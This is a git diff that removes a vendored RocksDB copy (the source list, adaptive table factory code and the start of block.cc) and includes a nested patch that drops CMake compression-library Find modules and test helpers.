+-find_package_handle_standard_args(lz4 DEFAULT_MSG LZ4_LIBRARIES LZ4_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  LZ4_LIBRARIES
+-  LZ4_INCLUDE_DIR)
+diff --git a/cmake/modules/Findsnappy.cmake b/cmake/modules/Findsnappy.cmake
+deleted file mode 100644
+index 6ed5fda3d..000000000
+--- a/cmake/modules/Findsnappy.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find Snappy
+-# Find the snappy compression library and includes
+-#
+-# SNAPPY_INCLUDE_DIR - where to find snappy.h, etc.
+-# SNAPPY_LIBRARIES - List of libraries when using snappy.
+-# SNAPPY_FOUND - True if snappy found.
+-
+-find_path(SNAPPY_INCLUDE_DIR
+-  NAMES snappy.h
+-  HINTS ${SNAPPY_ROOT_DIR}/include)
+-
+-find_library(SNAPPY_LIBRARIES
+-  NAMES snappy
+-  HINTS ${SNAPPY_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(snappy DEFAULT_MSG SNAPPY_LIBRARIES SNAPPY_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  SNAPPY_LIBRARIES
+-  SNAPPY_INCLUDE_DIR)
+diff --git a/cmake/modules/Findzlib.cmake b/cmake/modules/Findzlib.cmake
+deleted file mode 100644
+index fb5aee9b5..000000000
+--- a/cmake/modules/Findzlib.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find zlib
+-# Find the zlib compression library and includes
+-#
+-# ZLIB_INCLUDE_DIR - where to find zlib.h, etc.
+-# ZLIB_LIBRARIES - List of libraries when using zlib.
+-# ZLIB_FOUND - True if zlib found.
+-
+-find_path(ZLIB_INCLUDE_DIR
+-  NAMES zlib.h
+-  HINTS ${ZLIB_ROOT_DIR}/include)
+-
+-find_library(ZLIB_LIBRARIES
+-  NAMES z
+-  HINTS ${ZLIB_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(zlib DEFAULT_MSG ZLIB_LIBRARIES ZLIB_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  ZLIB_LIBRARIES
+-  ZLIB_INCLUDE_DIR)
+diff --git a/cmake/modules/Findzstd.cmake b/cmake/modules/Findzstd.cmake
+deleted file mode 100644
+index a2964aa9f..000000000
+--- a/cmake/modules/Findzstd.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find zstd
+-# Find the zstd compression library and includes
+-#
+-# ZSTD_INCLUDE_DIR - where to find zstd.h, etc.
+-# ZSTD_LIBRARIES - List of libraries when using zstd.
+-# ZSTD_FOUND - True if zstd found.
+-
+-find_path(ZSTD_INCLUDE_DIR
+-  NAMES zstd.h
+-  HINTS ${ZSTD_ROOT_DIR}/include)
+-
+-find_library(ZSTD_LIBRARIES
+-  NAMES zstd
+-  HINTS ${ZSTD_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(zstd DEFAULT_MSG ZSTD_LIBRARIES ZSTD_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  ZSTD_LIBRARIES
+-  ZSTD_INCLUDE_DIR)
+diff --git a/util/testharness.cc b/util/testharness.cc
+index 7ec353762..4626ea085 100644
+--- a/util/testharness.cc
++++ b/util/testharness.cc
+@@ -13,14 +13,6 @@
+ namespace rocksdb {
+ namespace test {
+ 
+-::testing::AssertionResult AssertStatus(const char* s_expr, const Status& s) {
+-  if (s.ok()) {
+-    return ::testing::AssertionSuccess();
+-  } else {
+-    return ::testing::AssertionFailure() << s_expr << std::endl
+-                                         << s.ToString();
+-  }
+-}
+ 
+ std::string TmpDir(Env* env) {
+   std::string dir;
+diff --git a/util/testharness.h b/util/testharness.h
+index 8da568123..44ee76eb9 100644
+--- a/util/testharness.h
++++ b/util/testharness.h
+@@ -9,12 +9,6 @@
+ 
+ #pragma once
+ 
+-#ifdef OS_AIX
+-#include "gtest/gtest.h"
+-#else
+-#include <gtest/gtest.h>
+-#endif
+-
+ #include <string>
+ #include "rocksdb/env.h"
+ 
+@@ -29,12 +23,5 @@ std::string TmpDir(Env* env = Env::Default());
+ // runs may be able to vary the seed.
+ int RandomSeed();
+ 
+-::testing::AssertionResult AssertStatus(const char* s_expr, const Status& s);
+-
+-#define ASSERT_OK(s) ASSERT_PRED_FORMAT1(rocksdb::test::AssertStatus, s)
+-#define ASSERT_NOK(s) ASSERT_FALSE((s).ok())
+-#define EXPECT_OK(s) EXPECT_PRED_FORMAT1(rocksdb::test::AssertStatus, s)
+-#define EXPECT_NOK(s) EXPECT_FALSE((s).ok())
+-
+ }  // namespace test
+ }  // namespace rocksdb
+diff --git a/utilities/cassandra/format.h b/utilities/cassandra/format.h
+index d8f51df14..fad6df4c4 100644
+--- a/utilities/cassandra/format.h
++++ b/utilities/cassandra/format.h
+@@ -177,17 +177,6 @@ private:
+   Columns columns_;
+   int64_t last_modified_time_;
+ 
+-  FRIEND_TEST(RowValueTest, PurgeTtlShouldRemvoeAllColumnsExpired);
+-  FRIEND_TEST(RowValueTest, ExpireTtlShouldConvertExpiredColumnsToTombstones);
+-  FRIEND_TEST(RowValueMergeTest, Merge);
+-  FRIEND_TEST(RowValueMergeTest, MergeWithRowTombstone);
+-  FRIEND_TEST(CassandraFunctionalTest, SimpleMergeTest);
+-  FRIEND_TEST(
+-    CassandraFunctionalTest, CompactionShouldConvertExpiredColumnsToTombstone);
+-  FRIEND_TEST(
+-    CassandraFunctionalTest, CompactionShouldPurgeExpiredColumnsIfPurgeTtlIsOn);
+-  FRIEND_TEST(
+-    CassandraFunctionalTest, CompactionShouldRemoveRowWhenAllColumnExpiredIfPurgeTtlIsOn);
+ };
+ 
+ } // namepsace cassandrda
diff --git a/thirdparty/rocksdb/src.mk b/thirdparty/rocksdb/src.mk
deleted file mode 100644
index 5bd5236..0000000
--- a/thirdparty/rocksdb/src.mk
+++ /dev/null
@@ -1,400 +0,0 @@
-# These are the sources from which librocksdb.a is built:
-LIB_SOURCES =                                                   \
-  cache/clock_cache.cc                                          \
-  cache/lru_cache.cc                                            \
-  cache/sharded_cache.cc                                        \
-  db/builder.cc                                                 \
-  db/c.cc                                                       \
-  db/column_family.cc                                           \
-  db/compacted_db_impl.cc                                       \
-  db/compaction.cc                                              \
-  db/compaction_iterator.cc                                     \
-  db/compaction_job.cc                                          \
-  db/compaction_picker.cc                                       \
-  db/compaction_picker_universal.cc                             \
-  db/convenience.cc                                             \
-  db/db_filesnapshot.cc                                         \
-  db/db_impl.cc                                                 \
-  db/db_impl_write.cc                                           \
-  db/db_impl_compaction_flush.cc                                \
-  db/db_impl_files.cc                                           \
-  db/db_impl_open.cc                                            \
-  db/db_impl_debug.cc                                           \
-  db/db_impl_experimental.cc                                    \
-  db/db_impl_readonly.cc                                        \
-  db/db_info_dumper.cc                                          \
-  db/db_iter.cc                                                 \
-  db/dbformat.cc                                                \
-  db/event_helpers.cc                                           \
-  db/experimental.cc                                            \
-  db/external_sst_file_ingestion_job.cc                         \
-  db/file_indexer.cc                                            \
-  db/flush_job.cc                                               \
-  db/flush_scheduler.cc                                         \
-  db/forward_iterator.cc                                        \
-  db/internal_stats.cc                                          \
-  db/log_reader.cc                                              \
-  db/log_writer.cc                                              \
-  db/malloc_stats.cc                                            \
-  db/managed_iterator.cc                                        \
-  db/memtable.cc                                                \
-  db/memtable_list.cc                                           \
-  db/merge_helper.cc                                            \
-  db/merge_operator.cc                                          \
-  db/range_del_aggregator.cc                                    \
-  db/repair.cc                                                  \
-  db/snapshot_impl.cc                                           \
-  db/table_cache.cc                                             \
-  db/table_properties_collector.cc                              \
-  db/transaction_log_impl.cc                                    \
-  db/version_builder.cc                                         \
-  db/version_edit.cc                                            \
-  db/version_set.cc                                             \
-  db/wal_manager.cc                                             \
-  db/write_batch.cc                                             \
-  db/write_batch_base.cc                                        \
-  db/write_controller.cc                                        \
-  db/write_thread.cc                                            \
-  env/env.cc                                                    \
-  env/env_chroot.cc                                             \
-  env/env_encryption.cc                                         \
-  env/env_hdfs.cc                                               \
-  env/env_posix.cc                                              \
-  env/io_posix.cc                                               \
-  env/mock_env.cc                                               \
-  memtable/alloc_tracker.cc                                     \
-  memtable/hash_cuckoo_rep.cc                                   \
-  memtable/hash_linklist_rep.cc                                 \
-  memtable/hash_skiplist_rep.cc                                 \
-  memtable/skiplistrep.cc                                       \
-  memtable/vectorrep.cc                                         \
-  memtable/write_buffer_manager.cc                              \
-  monitoring/histogram.cc                                       \
-  monitoring/histogram_windowing.cc                             \
-  monitoring/instrumented_mutex.cc                              \
-  monitoring/iostats_context.cc                                 \
-  monitoring/perf_context.cc                                    \
-  monitoring/perf_level.cc                                      \
-  monitoring/statistics.cc                                      \
-  monitoring/thread_status_impl.cc                              \
-  monitoring/thread_status_updater.cc                           \
-  monitoring/thread_status_updater_debug.cc                     \
-  monitoring/thread_status_util.cc                              \
-  monitoring/thread_status_util_debug.cc                        \
-  options/cf_options.cc                                         \
-  options/db_options.cc                                         \
-  options/options.cc                                            \
-  options/options_helper.cc                                     \
-  options/options_parser.cc                                     \
-  options/options_sanity_check.cc                               \
-  port/port_posix.cc                                            \
-  port/stack_trace.cc                                           \
-  table/adaptive_table_factory.cc                               \
-  table/block.cc                                                \
-  table/block_based_filter_block.cc                             \
-  table/block_based_table_builder.cc                            \
-  table/block_based_table_factory.cc                            \
-  table/block_based_table_reader.cc                             \
-  table/block_builder.cc                                        \
-  table/block_prefix_index.cc                                   \
-  table/bloom_block.cc                                          \
-  table/cuckoo_table_builder.cc                                 \
-  table/cuckoo_table_factory.cc                                 \
-  table/cuckoo_table_reader.cc                                  \
-  table/flush_block_policy.cc                                   \
-  table/format.cc                                               \
-  table/full_filter_block.cc                                    \
-  table/get_context.cc                                          \
-  table/index_builder.cc                                        \
-  table/iterator.cc                                             \
-  table/merging_iterator.cc                                     \
-  table/meta_blocks.cc                                          \
-  table/partitioned_filter_block.cc                             \
-  table/persistent_cache_helper.cc                              \
-  table/plain_table_builder.cc                                  \
-  table/plain_table_factory.cc                                  \
-  table/plain_table_index.cc                                    \
-  table/plain_table_key_coding.cc                               \
-  table/plain_table_reader.cc                                   \
-  table/sst_file_writer.cc                                      \
-  table/table_properties.cc                                     \
-  table/two_level_iterator.cc                                   \
-  tools/dump/db_dump_tool.cc                                    \
-  util/arena.cc                                                 \
-  util/auto_roll_logger.cc                                      \
-  util/bloom.cc                                                 \
-  util/build_version.cc                                         \
-  util/coding.cc                                                \
-  util/compaction_job_stats_impl.cc                             \
-  util/comparator.cc                                            \
-  util/concurrent_arena.cc                                      \
-  util/crc32c.cc                                                \
-  util/delete_scheduler.cc                                      \
-  util/dynamic_bloom.cc                                         \
-  util/event_logger.cc                                          \
-  util/file_reader_writer.cc                                    \
-  util/file_util.cc                                             \
-  util/filename.cc                                              \
-  util/filter_policy.cc                                         \
-  util/hash.cc                                                  \
-  util/log_buffer.cc                                            \
-  util/murmurhash.cc                                            \
-  util/random.cc                                                \
-  util/rate_limiter.cc                                          \
-  util/slice.cc                                                 \
-  util/sst_file_manager_impl.cc                                 \
-  util/status.cc                                                \
-  util/status_message.cc                                        \
-  util/string_util.cc                                           \
-  util/sync_point.cc                                            \
-  util/thread_local.cc                                          \
-  util/threadpool_imp.cc                                        \
-  util/transaction_test_util.cc                                 \
-  util/xxhash.cc                                                \
-  utilities/backupable/backupable_db.cc                         \
-  utilities/blob_db/blob_db.cc                                  \
-  utilities/blob_db/blob_db_impl.cc                             \
-  utilities/blob_db/blob_file.cc                                \
-  utilities/blob_db/blob_log_reader.cc                          \
-  utilities/blob_db/blob_log_writer.cc                          \
-  utilities/blob_db/blob_log_format.cc                          \
-  utilities/blob_db/ttl_extractor.cc                            \
-  utilities/cassandra/cassandra_compaction_filter.cc            \
-  utilities/cassandra/format.cc                                 \
-  utilities/cassandra/merge_operator.cc                         \
-  utilities/checkpoint/checkpoint_impl.cc                       \
-  utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc    \
-  utilities/convenience/info_log_finder.cc                      \
-  utilities/date_tiered/date_tiered_db_impl.cc                  \
-  utilities/debug.cc                                        	\
-  utilities/document/document_db.cc                             \
-  utilities/document/json_document.cc                           \
-  utilities/document/json_document_builder.cc                   \
-  utilities/env_mirror.cc                                       \
-  utilities/env_timed.cc                                        \
-  utilities/geodb/geodb_impl.cc                                 \
-  utilities/leveldb_options/leveldb_options.cc                  \
-  utilities/lua/rocks_lua_compaction_filter.cc                  \
-  utilities/memory/memory_util.cc                               \
-  utilities/merge_operators/max.cc                              \
-  utilities/merge_operators/put.cc                              \
-  utilities/merge_operators/string_append/stringappend.cc       \
-  utilities/merge_operators/string_append/stringappend2.cc      \
-  utilities/merge_operators/uint64add.cc                        \
-  utilities/option_change_migration/option_change_migration.cc  \
-  utilities/options/options_util.cc                             \
-  utilities/persistent_cache/block_cache_tier.cc                \
-  utilities/persistent_cache/block_cache_tier_file.cc           \
-  utilities/persistent_cache/block_cache_tier_metadata.cc       \
-  utilities/persistent_cache/persistent_cache_tier.cc           \
-  utilities/persistent_cache/volatile_tier_impl.cc              \
-  utilities/redis/redis_lists.cc                                \
-  utilities/simulator_cache/sim_cache.cc                        \
-  utilities/spatialdb/spatial_db.cc                             \
-  utilities/table_properties_collectors/compact_on_deletion_collector.cc \
-  utilities/transactions/optimistic_transaction_db_impl.cc      \
-  utilities/transactions/optimistic_transaction.cc         \
-  utilities/transactions/transaction_base.cc                    \
-  utilities/transactions/pessimistic_transaction_db.cc                 \
-  utilities/transactions/transaction_db_mutex_impl.cc           \
-  utilities/transactions/pessimistic_transaction.cc                    \
-  utilities/transactions/transaction_lock_mgr.cc                \
-  utilities/transactions/transaction_util.cc                    \
-  utilities/transactions/write_prepared_txn.cc     \
-  utilities/ttl/db_ttl_impl.cc                                  \
-  utilities/write_batch_with_index/write_batch_with_index.cc    \
-  utilities/write_batch_with_index/write_batch_with_index_internal.cc    \
-
-TOOL_LIB_SOURCES = \
-  tools/ldb_cmd.cc                                               \
-  tools/ldb_tool.cc                                              \
-  tools/sst_dump_tool.cc                                         \
-  utilities/blob_db/blob_dump_tool.cc                            \
-
-MOCK_LIB_SOURCES = \
-  table/mock_table.cc \
-  util/fault_injection_test_env.cc
-
-BENCH_LIB_SOURCES = \
-  tools/db_bench_tool.cc                                        \
-
-EXP_LIB_SOURCES = \
-  utilities/col_buf_encoder.cc                                          \
-  utilities/col_buf_decoder.cc                                          \
-  utilities/column_aware_encoding_util.cc
-
-TEST_LIB_SOURCES = \
-  util/testharness.cc                                                   \
-  util/testutil.cc                                                      \
-  db/db_test_util.cc                                                    \
-  utilities/cassandra/test_utils.cc                                     \
-
-MAIN_SOURCES =                                                    \
-  cache/cache_bench.cc                                                   \
-  cache/cache_test.cc                                                    \
-  db/column_family_test.cc                                              \
-  db/compaction_job_stats_test.cc                                       \
-  db/compaction_job_test.cc                                             \
-  db/compaction_picker_test.cc                                          \
-  db/comparator_db_test.cc                                              \
-  db/corruption_test.cc                                                 \
-  db/cuckoo_table_db_test.cc                                            \
-  db/db_basic_test.cc                                                   \
-  db/db_block_cache_test.cc                                             \
-  db/db_bloom_filter_test.cc                                            \
-  db/db_compaction_filter_test.cc                                       \
-  db/db_compaction_test.cc                                              \
-  db/db_dynamic_level_test.cc                                           \
-  db/db_encryption_test.cc                                              \
-  db/db_flush_test.cc                                                    \
-  db/db_inplace_update_test.cc                                          \
-  db/db_io_failure_test.cc                                              \
-  db/db_iter_test.cc                                                    \
-  db/db_iterator_test.cc                                                \
-  db/db_log_iter_test.cc                                                \
-  db/db_memtable_test.cc                                                \
-  db/db_merge_operator_test.cc                                          \
-  db/db_options_test.cc                                                 \
-  db/db_range_del_test.cc                                               \
-  db/db_sst_test.cc                                                     \
-  db/db_statistics_test.cc                                              \
-  db/db_table_properties_test.cc                                        \
-  db/db_tailing_iter_test.cc                                            \
-  db/db_test.cc                                                         \
-  db/db_universal_compaction_test.cc                                    \
-  db/db_wal_test.cc                                                     \
-  db/db_write_test.cc                                                   \
-  db/dbformat_test.cc                                                   \
-  db/deletefile_test.cc                                                 \
-  db/external_sst_file_basic_test.cc                                    \
-  db/external_sst_file_test.cc                                          \
-  db/fault_injection_test.cc                                            \
-  db/file_indexer_test.cc                                               \
-  db/filename_test.cc                                                   \
-  db/flush_job_test.cc                                                  \
-  db/listener_test.cc                                                   \
-  db/log_test.cc                                                        \
-  db/manual_compaction_test.cc                                          \
-  db/merge_test.cc                                                      \
-  db/options_file_test.cc                                               \
-  db/perf_context_test.cc                                               \
-  db/plain_table_db_test.cc                                             \
-  db/prefix_test.cc                                                     \
-  db/table_properties_collector_test.cc                                 \
-  db/version_builder_test.cc                                            \
-  db/version_edit_test.cc                                               \
-  db/version_set_test.cc                                                \
-  db/wal_manager_test.cc                                                \
-  db/write_batch_test.cc                                                \
-  db/write_callback_test.cc                                             \
-  db/write_controller_test.cc                                           \
-  env/env_basic_test.cc                                                 \
-  env/env_test.cc                                                       \
-  env/mock_env_test.cc                                                  \
-  memtable/inlineskiplist_test.cc                                       \
-  memtable/memtablerep_bench.cc                                         \
-  memtable/skiplist_test.cc                                             \
-  memtable/write_buffer_manager_test.cc                                 \
-  monitoring/histogram_test.cc                                          \
-  monitoring/iostats_context_test.cc                                    \
-  monitoring/statistics_test.cc                                         \
-  options/options_test.cc                                               \
-  table/block_based_filter_block_test.cc                                \
-  table/block_test.cc                                                   \
-  table/cleanable_test.cc                                               \
-  table/cuckoo_table_builder_test.cc                                    \
-  table/cuckoo_table_reader_test.cc                                     \
-  table/full_filter_block_test.cc                                       \
-  table/merger_test.cc                                                  \
-  table/table_reader_bench.cc                                           \
-  table/table_test.cc                                                   \
-  third-party/gtest-1.7.0/fused-src/gtest/gtest-all.cc                  \
-  tools/db_bench.cc                                                     \
-  tools/db_bench_tool_test.cc                                           \
-  tools/db_sanity_test.cc                                               \
-  tools/ldb_cmd_test.cc                                                 \
-  tools/reduce_levels_test.cc                                           \
-  tools/sst_dump_test.cc                                                \
-  util/arena_test.cc                                                    \
-  util/auto_roll_logger_test.cc                                         \
-  util/autovector_test.cc                                               \
-  util/bloom_test.cc                                                    \
-  util/coding_test.cc                                                   \
-  util/crc32c_test.cc                                                   \
-  util/dynamic_bloom_test.cc                                            \
-  util/event_logger_test.cc                                             \
-  util/filelock_test.cc                                                 \
-  util/log_write_bench.cc                                               \
-  util/rate_limiter_test.cc                                             \
-  util/slice_transform_test.cc                                          \
-  util/timer_queue_test.cc                                              \
-  util/thread_list_test.cc                                              \
-  util/thread_local_test.cc                                             \
-  utilities/backupable/backupable_db_test.cc                            \
-  utilities/blob_db/blob_db_test.cc                                     \
-  utilities/cassandra/cassandra_format_test.cc                          \
-  utilities/cassandra/cassandra_functional_test.cc                      \
-  utilities/cassandra/cassandra_row_merge_test.cc                       \
-  utilities/cassandra/cassandra_serialize_test.cc                       \
-  utilities/checkpoint/checkpoint_test.cc                               \
-  utilities/column_aware_encoding_exp.cc                                \
-  utilities/column_aware_encoding_test.cc                               \
-  utilities/date_tiered/date_tiered_test.cc                             \
-  utilities/document/document_db_test.cc                                \
-  utilities/document/json_document_test.cc                              \
-  utilities/geodb/geodb_test.cc                                         \
-  utilities/lua/rocks_lua_test.cc                                       \
-  utilities/memory/memory_test.cc                                       \
-  utilities/merge_operators/string_append/stringappend_test.cc          \
-  utilities/object_registry_test.cc                                     \
-  utilities/option_change_migration/option_change_migration_test.cc     \
-  utilities/options/options_util_test.cc                                \
-  utilities/redis/redis_lists_test.cc                                   \
-  utilities/simulator_cache/sim_cache_test.cc                           \
-  utilities/spatialdb/spatial_db_test.cc                                \
-  utilities/table_properties_collectors/compact_on_deletion_collector_test.cc  \
-  utilities/transactions/optimistic_transaction_test.cc                 \
-  utilities/transactions/transaction_test.cc                            \
-  utilities/ttl/ttl_test.cc                                             \
-  utilities/write_batch_with_index/write_batch_with_index_test.cc       \
-
-JNI_NATIVE_SOURCES =                                          \
-  java/rocksjni/backupenginejni.cc                            \
-  java/rocksjni/backupablejni.cc                              \
-  java/rocksjni/checkpoint.cc                                 \
-  java/rocksjni/clock_cache.cc                                \
-  java/rocksjni/columnfamilyhandle.cc                         \
-  java/rocksjni/compaction_filter.cc                          \
-  java/rocksjni/compaction_options_fifo.cc                    \
-  java/rocksjni/compaction_options_universal.cc               \
-  java/rocksjni/comparator.cc                                 \
-  java/rocksjni/comparatorjnicallback.cc                      \
-  java/rocksjni/compression_options.cc                        \
-  java/rocksjni/env.cc                                        \
-  java/rocksjni/env_options.cc                                \
-  java/rocksjni/ingest_external_file_options.cc               \
-  java/rocksjni/filter.cc                                     \
-  java/rocksjni/iterator.cc                                   \
-  java/rocksjni/loggerjnicallback.cc                          \
-  java/rocksjni/lru_cache.cc                                  \
-  java/rocksjni/memtablejni.cc                                \
-  java/rocksjni/merge_operator.cc                             \
-  java/rocksjni/options.cc                                    \
-  java/rocksjni/ratelimiterjni.cc                             \
-  java/rocksjni/remove_emptyvalue_compactionfilterjni.cc      \
-  java/rocksjni/cassandra_compactionfilterjni.cc              \
-  java/rocksjni/restorejni.cc                                 \
-  java/rocksjni/rocksjni.cc                                   \
-  java/rocksjni/rocksdb_exception_test.cc                     \
-  java/rocksjni/slice.cc                                      \
-  java/rocksjni/snapshot.cc                                   \
-  java/rocksjni/sst_file_writerjni.cc                         \
-  java/rocksjni/statistics.cc                                 \
-  java/rocksjni/statisticsjni.cc                              \
-  java/rocksjni/table.cc                                      \
-  java/rocksjni/transaction_log.cc                            \
-  java/rocksjni/ttl.cc                                        \
-  java/rocksjni/write_batch.cc                                \
-  java/rocksjni/writebatchhandlerjnicallback.cc               \
-  java/rocksjni/write_batch_test.cc                           \
-  java/rocksjni/write_batch_with_index.cc
diff --git a/thirdparty/rocksdb/table/adaptive_table_factory.cc b/thirdparty/rocksdb/table/adaptive_table_factory.cc
deleted file mode 100644
index 47069f8..0000000
--- a/thirdparty/rocksdb/table/adaptive_table_factory.cc
+++ /dev/null
@@ -1,123 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-#include "table/adaptive_table_factory.h"
-
-#include "table/table_builder.h"
-#include "table/format.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-AdaptiveTableFactory::AdaptiveTableFactory(
-    std::shared_ptr<TableFactory> table_factory_to_write,
-    std::shared_ptr<TableFactory> block_based_table_factory,
-    std::shared_ptr<TableFactory> plain_table_factory,
-    std::shared_ptr<TableFactory> cuckoo_table_factory)
-    : table_factory_to_write_(table_factory_to_write),
-      block_based_table_factory_(block_based_table_factory),
-      plain_table_factory_(plain_table_factory),
-      cuckoo_table_factory_(cuckoo_table_factory) {
-  if (!plain_table_factory_) {
-    plain_table_factory_.reset(NewPlainTableFactory());
-  }
-  if (!block_based_table_factory_) {
-    block_based_table_factory_.reset(NewBlockBasedTableFactory());
-  }
-  if (!cuckoo_table_factory_) {
-    cuckoo_table_factory_.reset(NewCuckooTableFactory());
-  }
-  if (!table_factory_to_write_) {
-    table_factory_to_write_ = block_based_table_factory_;
-  }
-}
-
-extern const uint64_t kPlainTableMagicNumber;
-extern const uint64_t kLegacyPlainTableMagicNumber;
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-extern const uint64_t kCuckooTableMagicNumber;
-
-Status AdaptiveTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    unique_ptr<TableReader>* table,
-    bool prefetch_index_and_filter_in_cache) const {
-  Footer footer;
-  auto s = ReadFooterFromFile(file.get(), nullptr /* prefetch_buffer */,
-                              file_size, &footer);
-  if (!s.ok()) {
-    return s;
-  }
-  if (footer.table_magic_number() == kPlainTableMagicNumber ||
-      footer.table_magic_number() == kLegacyPlainTableMagicNumber) {
-    return plain_table_factory_->NewTableReader(
-        table_reader_options, std::move(file), file_size, table);
-  } else if (footer.table_magic_number() == kBlockBasedTableMagicNumber ||
-      footer.table_magic_number() == kLegacyBlockBasedTableMagicNumber) {
-    return block_based_table_factory_->NewTableReader(
-        table_reader_options, std::move(file), file_size, table);
-  } else if (footer.table_magic_number() == kCuckooTableMagicNumber) {
-    return cuckoo_table_factory_->NewTableReader(
-        table_reader_options, std::move(file), file_size, table);
-  } else {
-    return Status::NotSupported("Unidentified table format");
-  }
-}
-
-TableBuilder* AdaptiveTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  return table_factory_to_write_->NewTableBuilder(table_builder_options,
-                                                  column_family_id, file);
-}
-
-std::string AdaptiveTableFactory::GetPrintableTableOptions() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  if (table_factory_to_write_) {
-    snprintf(buffer, kBufferSize, "  write factory (%s) options:\n%s\n",
-             (table_factory_to_write_->Name() ? table_factory_to_write_->Name()
-                                              : ""),
-             table_factory_to_write_->GetPrintableTableOptions().c_str());
-    ret.append(buffer);
-  }
-  if (plain_table_factory_) {
-    snprintf(buffer, kBufferSize, "  %s options:\n%s\n",
-             plain_table_factory_->Name() ? plain_table_factory_->Name() : "",
-             plain_table_factory_->GetPrintableTableOptions().c_str());
-    ret.append(buffer);
-  }
-  if (block_based_table_factory_) {
-    snprintf(
-        buffer, kBufferSize, "  %s options:\n%s\n",
-        (block_based_table_factory_->Name() ? block_based_table_factory_->Name()
-                                            : ""),
-        block_based_table_factory_->GetPrintableTableOptions().c_str());
-    ret.append(buffer);
-  }
-  if (cuckoo_table_factory_) {
-    snprintf(buffer, kBufferSize, "  %s options:\n%s\n",
-             cuckoo_table_factory_->Name() ? cuckoo_table_factory_->Name() : "",
-             cuckoo_table_factory_->GetPrintableTableOptions().c_str());
-    ret.append(buffer);
-  }
-  return ret;
-}
-
-extern TableFactory* NewAdaptiveTableFactory(
-    std::shared_ptr<TableFactory> table_factory_to_write,
-    std::shared_ptr<TableFactory> block_based_table_factory,
-    std::shared_ptr<TableFactory> plain_table_factory,
-    std::shared_ptr<TableFactory> cuckoo_table_factory) {
-  return new AdaptiveTableFactory(table_factory_to_write,
-      block_based_table_factory, plain_table_factory, cuckoo_table_factory);
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/adaptive_table_factory.h b/thirdparty/rocksdb/table/adaptive_table_factory.h
deleted file mode 100644
index b7b52ba..0000000
--- a/thirdparty/rocksdb/table/adaptive_table_factory.h
+++ /dev/null
@@ -1,62 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-struct EnvOptions;
-
-using std::unique_ptr;
-class Status;
-class RandomAccessFile;
-class WritableFile;
-class Table;
-class TableBuilder;
-
-class AdaptiveTableFactory : public TableFactory {
- public:
-  ~AdaptiveTableFactory() {}
-
-  explicit AdaptiveTableFactory(
-      std::shared_ptr<TableFactory> table_factory_to_write,
-      std::shared_ptr<TableFactory> block_based_table_factory,
-      std::shared_ptr<TableFactory> plain_table_factory,
-      std::shared_ptr<TableFactory> cuckoo_table_factory);
-
-  const char* Name() const override { return "AdaptiveTableFactory"; }
-
-  Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table,
-      bool prefetch_index_and_filter_in_cache = true) const override;
-
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override;
-
-  // Sanitizes the specified DB Options.
-  Status SanitizeOptions(const DBOptions& db_opts,
-                         const ColumnFamilyOptions& cf_opts) const override {
-    return Status::OK();
-  }
-
-  std::string GetPrintableTableOptions() const override;
-
- private:
-  std::shared_ptr<TableFactory> table_factory_to_write_;
-  std::shared_ptr<TableFactory> block_based_table_factory_;
-  std::shared_ptr<TableFactory> plain_table_factory_;
-  std::shared_ptr<TableFactory> cuckoo_table_factory_;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/block.cc b/thirdparty/rocksdb/table/block.cc
deleted file mode 100644
index 372bbd2..0000000
--- a/thirdparty/rocksdb/table/block.cc
+++ /dev/null
@@ -1,477 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Decodes the blocks generated by block_builder.cc.
-
-#include "table/block.h"
-#include <algorithm>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "monitoring/perf_context_imp.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/comparator.h"
-#include "table/block_prefix_index.h"
-#include "table/format.h"
-#include "util/coding.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-// Helper routine: decode the next block entry starting at "p",
-// storing the number of shared key bytes, non_shared key bytes,
-// and the length of the value in "*shared", "*non_shared", and
